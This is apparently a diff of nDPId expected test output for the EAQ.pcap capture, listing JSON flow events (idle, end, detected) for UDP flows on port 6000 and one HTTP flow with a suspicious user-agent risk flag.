-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820956931,"flow_last_seen":1432821043151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820959095,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820957932,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820954931,"flow_last_seen":1432821041151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949806,"flow_last_seen":1432821014655,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821014655,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950935,"flow_last_seen":1432821015651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821015651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820951932,"flow_last_seen":1432821016651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821016651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820952931,"flow_last_seen":1432821017651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821017651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820953931,"flow_last_seen":1432821018651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821018651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820954931,"flow_last_seen":1432821019651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821019651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820955933,"flow_last_seen":1432821020651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821020651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820956931,"flow_last_seen":1432821021652,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821021652,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957985,"flow_last_seen":1432821022695,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821022695,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959095,"flow_last_seen":1432821023795,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821023795,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821024791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821025791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821026791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821027791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821028791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821029791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821030791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821031791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821032791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821033791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821034791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820957985,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820959035,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820955933,"flow_last_seen":1432821042151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 